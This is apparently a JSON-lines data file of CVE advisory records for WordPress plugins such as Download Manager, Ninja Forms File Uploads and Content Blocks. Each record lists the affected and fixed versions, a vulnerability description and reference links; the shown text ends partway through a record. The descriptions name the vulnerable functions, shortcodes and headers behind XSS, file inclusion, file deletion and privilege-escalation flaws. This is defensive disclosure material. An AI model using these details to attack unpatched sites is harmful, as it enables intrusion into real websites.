{"CVE_ID":"CVE-2024-1596","slug":"ninja-forms-uploads","versionImpact":"3.3.16","versionEndExcluding":"3.3.18","description":"The Ninja Forms - File Uploads plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an uploaded file (e.g. RTX file) in all versions up to, and including, 3.3.16 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/499a1892-12b7-49d5-b65f-4f53a968a23a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/499a1892-12b7-49d5-b65f-4f53a968a23a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ninjaforms.com\\\/extensions\\\/file-uploads\\\/\",\"name\":\"https:\\\/\\\/ninjaforms.com\\\/extensions\\\/file-uploads\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ninjaforms.com\\\/extensions\\\/file-uploads\\\/?changelog=1\\\/\",\"name\":\"https:\\\/\\\/ninjaforms.com\\\/extensions\\\/file-uploads\\\/?changelog=1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5234","slug":"woo-related-products-refresh-on-reload","versionImpact":"3.3.15","versionEndExcluding":"3.3.16","description":"The Related Products for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'woo-related' shortcode in versions up to, and including, 3.3.15 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a98498b8-9397-42e9-9c99-a576975c9ac9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a98498b8-9397-42e9-9c99-a576975c9ac9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-related-products-refresh-on-reload\\\/tags\\\/3.3.15\\\/woo-related-products.php#L303\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-related-products-refresh-on-reload\\\/tags\\\/3.3.15\\\/woo-related-products.php#L303\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2988185\\\/woo-related-products-refresh-on-reload\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2988185\\\/woo-related-products-refresh-on-reload\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3404","slug":"download-manager","versionImpact":"3.3.12","versionEndExcluding":"3.3.13","description":"The Download Manager plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the savePackage function in all versions up to, and including, 3.3.12. This makes it possible for authenticated attackers, with Author-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 3.3.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.3.12\\\/src\\\/Admin\\\/Menu\\\/Packages.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.3.12\\\/src\\\/Admin\\\/Menu\\\/Packages.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.3.12\\\/src\\\/Admin\\\/Menu\\\/Packages.php#L56\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.3.12\\\/src\\\/Admin\\\/Menu\\\/Packages.php#L56\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21f8f5be-b513-4040-af39-c1a61d7e313f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21f8f5be-b513-4040-af39-c1a61d7e313f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7624","slug":"zephyr-project-manager","versionImpact":"3.3.101","versionEndExcluding":"3.3.102","description":"The Zephyr Project Manager plugin for WordPress is vulnerable to limited privilege escalation in all versions up to, and including, 3.3.101. This is due to the plugin not properly checking a users capabilities before allowing them to enable access to the plugin's settings through the update_user_access() function. This makes it possible for authenticated attackers, with subscriber-level access and above, to grant themselves full access to the plugin's settings.","recommendation":"Update to version 3.3.102, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9ef344d-cd56-43f9-b185-de83a92800de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9ef344d-cd56-43f9-b185-de83a92800de?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zephyr-project-manager\\\/trunk\\\/includes\\\/Base\\\/AjaxHandler.php?rev=3111536#L2464\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zephyr-project-manager\\\/trunk\\\/includes\\\/Base\\\/AjaxHandler.php?rev=3111536#L2464\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134404\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134404\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11452","slug":"chamber-dashboard-business-directory","versionImpact":"3.3.8","versionEndExcluding":"3.3.10","description":"The Chamber Dashboard Business Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'business_categories' shortcode in all versions up to, and including, 3.3.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chamber-dashboard-business-directory\\\/trunk\\\/shortcodes\\\/bus_cat_shortcode.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chamber-dashboard-business-directory\\\/trunk\\\/shortcodes\\\/bus_cat_shortcode.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222548\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222548\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54e5989f-3d2c-4ed3-b4c4-f2589b885637?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54e5989f-3d2c-4ed3-b4c4-f2589b885637?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5614","slug":"theme-switcha","versionImpact":"3.3","versionEndExcluding":"3.3.1","description":"The Theme Switcha plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'theme_switcha_list' shortcode in all versions up to, and including, 3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theme-switcha\\\/tags\\\/3.3\\\/inc\\\/plugin-core.php#L445\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theme-switcha\\\/tags\\\/3.3\\\/inc\\\/plugin-core.php#L445\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b0937fe-3ea6-427a-aef7-539c08687abb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b0937fe-3ea6-427a-aef7-539c08687abb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2979783\\\/theme-switcha#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2979783\\\/theme-switcha#file1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3565","slug":"custom-post-widget","versionImpact":"3.3.0","versionEndExcluding":"3.3.1","description":"The Content Blocks (Custom Post Widget) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'content_block' shortcode in all versions up to, and including, 3.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16d8eab2-953a-46bf-a0f6-296bcea86305?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16d8eab2-953a-46bf-a0f6-296bcea86305?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-post-widget\\\/trunk\\\/shortcode.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-post-widget\\\/trunk\\\/shortcode.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3078739%40custom-post-widget&new=3078739%40custom-post-widget&sfp_email=&sfph_mail=#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3078739%40custom-post-widget&new=3078739%40custom-post-widget&sfp_email=&sfph_mail=#file6\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3564","slug":"custom-post-widget","versionImpact":"3.3.0","versionEndExcluding":"3.3.1","description":"The Content Blocks (Custom Post Widget) plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.0 via the plugin's 'content_block' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 3.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5a0b8fe-d284-4780-84b5-2e97fa96c99a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5a0b8fe-d284-4780-84b5-2e97fa96c99a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3078739%40custom-post-widget&new=3078739%40custom-post-widget&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3078739%40custom-post-widget&new=3078739%40custom-post-widget&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0252","slug":"contextual-related-posts","versionEndExcluding":"3.3.1","description":"The Contextual Related Posts WordPress plugin before 3.3.1 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5754a4fd-1adf-47aa-976f-3b28750058c2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5754a4fd-1adf-47aa-976f-3b28750058c2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-29142","slug":"better-search","versionImpact":"3.3.0","versionEndExcluding":"3.3.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebberZone Better Search \u2013 Relevant search results for WordPress allows Stored XSS.This issue affects Better Search \u2013 Relevant search results for WordPress: from n\/a through 3.3.0.\n\n","recommendation":"Update to version 3.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/better-search\\\/wordpress-better-search-plugin-3-3-0-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/better-search\\\/wordpress-better-search-plugin-3-3-0-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13552","slug":"supportcandy","versionImpact":"3.3.0","versionEndExcluding":"3.3.1","description":"The SupportCandy \u2013 Helpdesk & Customer Support Ticket System plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.3.0 via file upload due to missing validation on a user controlled key. This makes it possible for authenticated attackers to download attachments for support tickets that don't belong to them. If an admin enables tickets for guests, this can be exploited by unauthenticated attackers.","recommendation":"Update to version 3.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supportcandy\\\/trunk\\\/includes\\\/admin\\\/tickets\\\/class-wpsc-new-ticket.php#L395\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supportcandy\\\/trunk\\\/includes\\\/admin\\\/tickets\\\/class-wpsc-new-ticket.php#L395\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235142\\\/supportcandy\\\/trunk?old=3188306&old_path=%2Fsupportcandy%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235142\\\/supportcandy\\\/trunk?old=3188306&old_path=%2Fsupportcandy%2Ftrunk\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13f87248-cc0b-4351-b79d-6efc5190b021?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13f87248-cc0b-4351-b79d-6efc5190b021?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2013-10028","slug":"eelv-newsletter","versionImpact":"3.3.0","versionEndExcluding":"3.3.1","description":"A vulnerability was found in EELV Newsletter Plugin 2.x on WordPress. It has been rated as problematic. Affected by this issue is the function style_newsletter of the file lettreinfo.php. The manipulation of the argument email leads to cross site scripting. The attack may be launched remotely. The name of the patch is 3339b42316c5edf73e56eb209b6a3bb3e868d6ed. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230660.","recommendation":"Update to version 3.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/eelv-newsletter\\\/commit\\\/3339b42316c5edf73e56eb209b6a3bb3e868d6ed\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/eelv-newsletter\\\/commit\\\/3339b42316c5edf73e56eb209b6a3bb3e868d6ed\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230660\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230660\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230660\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230660\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9860","slug":"bridge-core","versionImpact":"3.3","versionEndExcluding":"3.3.1","description":"The Bridge Core plugin for WordPress is vulnerable to unauthorized modification of data or loss of data due to a missing capability check on the 'import_action' and 'install_plugin_per_demo' functions in versions up to, and including, 3.3. This makes it possible for authenticated attackers with subscriber-level permissions or above, to delete or change plugin settings, import demo data, and install limited plugins.","recommendation":"Update to version 3.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/968d5d31-2592-4bed-9d18-5877f0d6062e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/968d5d31-2592-4bed-9d18-5877f0d6062e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/bridge-creative-multipurpose-wordpress-theme\\\/7315054\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/bridge-creative-multipurpose-wordpress-theme\\\/7315054\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5050","slug":"leaflet-map","versionImpact":"3.3.0","versionEndExcluding":"3.3.1","description":"The Leaflet Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 3.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3084c9ab-00aa-4b8e-aa46-bd70b335ec77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3084c9ab-00aa-4b8e-aa46-bd70b335ec77?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leaflet-map\\\/tags\\\/3.3.0\\\/shortcodes\\\/class.geojson-shortcode.php#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leaflet-map\\\/tags\\\/3.3.0\\\/shortcodes\\\/class.geojson-shortcode.php#L124\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2968965\\\/leaflet-map#file12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2968965\\\/leaflet-map#file12\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13900","slug":"header-footer","versionImpact":"3.3.0","versionEndExcluding":"3.3.1","description":"The Head, Footer and Post Injections plugin for WordPress is vulnerable to PHP Code Injection in all versions up to, and including, 3.3.0. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject PHP Code in multisite environments.","recommendation":"Update to version 3.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244016\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244016\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5177bde6-4922-48ee-9155-577c392809a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5177bde6-4922-48ee-9155-577c392809a0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1785","slug":"download-manager","versionImpact":"3.3.08","versionEndExcluding":"3.3.09","description":"The Download Manager plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3.08 via the 'wpdm_newfile' action. This makes it possible for authenticated attackers, with Author-level access and above, to overwrite select file types outside of the originally intended directory, which may cause a denial of service.","recommendation":"Update to version 3.3.09, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3252990%40download-manager&new=3252990%40download-manager&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3252990%40download-manager&new=3252990%40download-manager&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc5c7974-4c10-4880-8823-2accee3c0da4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc5c7974-4c10-4880-8823-2accee3c0da4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13126","slug":"download-manager","versionImpact":"3.3.06","versionEndExcluding":"3.3.07","description":"The Download Manager WordPress plugin before 3.3.07 doesn't prevent directory listing on web servers that don't use htaccess, allowing unauthorized access of files.","recommendation":"Update to version 3.3.07, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c2c69a44-4ecc-41d1-a10c-cfe9c875b803\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c2c69a44-4ecc-41d1-a10c-cfe9c875b803\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11768","slug":"download-manager","versionImpact":"3.3.03","versionEndExcluding":"3.3.04","description":"The Download Manager plugin for WordPress is vulnerable to unauthorized download of password-protected content due to improper password validation on the checkFilePassword function in all versions up to, and including, 3.3.03. This makes it possible for unauthenticated attackers to download password-protected files.","recommendation":"Update to version 3.3.04, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/__\\\/Apply.php#L376\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/__\\\/Apply.php#L376\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/feb915f4-66d6-4f46-949c-5354e414319b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/feb915f4-66d6-4f46-949c-5354e414319b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11740","slug":"download-manager","versionImpact":"3.3.03","versionEndExcluding":"3.3.04","description":"The Download Manager plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.3.03. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 3.3.04, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.3.02\\\/src\\\/Package\\\/Hooks.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.3.02\\\/src\\\/Package\\\/Hooks.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.3.02\\\/src\\\/Package\\\/views\\\/shortcode-iframe.php#L203\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.3.02\\\/src\\\/Package\\\/views\\\/shortcode-iframe.php#L203\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a7be578-5883-4cd3-963d-bf81c3af2003?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a7be578-5883-4cd3-963d-bf81c3af2003?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10706","slug":"download-manager","versionImpact":"3.3.02","versionEndExcluding":"3.3.03","description":"The Download Manager WordPress plugin before 3.3.03 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.3.03, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/01193420-9a4c-4961-93b6-aa2e37e36be1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/01193420-9a4c-4961-93b6-aa2e37e36be1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8444","slug":"download-manager","versionImpact":"3.2.99","versionEndExcluding":"3.3.00","description":"The Download Manager WordPress plugin before 3.3.00 doesn't sanitize some of its shortcode parameters, leading to cross site scripting.","recommendation":"Update to version 3.3.00, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf2f5aa8-a161-43ff-a6ee-8603aaba8012\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf2f5aa8-a161-43ff-a6ee-8603aaba8012\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3751","slug":"seriously-simple-podcasting","versionImpact":"3.2.0","versionEndExcluding":"3.3.0","description":"The Seriously Simple Podcasting WordPress plugin before 3.3.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c684b05-2545-4fa5-ba9e-91d8b8f725ac\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c684b05-2545-4fa5-ba9e-91d8b8f725ac\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4869","slug":"gdpr-cookie-consent","versionImpact":"3.2.0","versionEndExcluding":"3.3.0","description":"The WP Cookie Consent ( for GDPR, CCPA & ePrivacy ) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018Client-IP\u2019 header in all versions up to, and including, 3.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/507b2e65-987b-4d4a-8a99-5366048d925e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/507b2e65-987b-4d4a-8a99-5366048d925e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gdpr-cookie-consent\\\/tags\\\/3.2.0\\\/public\\\/class-gdpr-cookie-consent-public.php#L793\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gdpr-cookie-consent\\\/tags\\\/3.2.0\\\/public\\\/class-gdpr-cookie-consent-public.php#L793\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gdpr-cookie-consent\\\/tags\\\/3.2.0\\\/public\\\/modules\\\/consent-logs\\\/class-wpl-cookie-consent-consent-logs.php#L570\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gdpr-cookie-consent\\\/tags\\\/3.2.0\\\/public\\\/modules\\\/consent-logs\\\/class-wpl-cookie-consent-consent-logs.php#L570\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11685","slug":"kudos-donations","versionImpact":"3.2.9","versionEndExcluding":"3.3.0","description":"The `Kudos Donations \u2013 Easy donations and payments with Mollie` plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of `add_query_arg` without appropriate escaping on the URL in all versions up to, and including, 3.2.9. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute if they can successfully trick a user into performing an action, such as clicking on a specially crafted link.","recommendation":"Update to version 3.3.0, or a newer patched 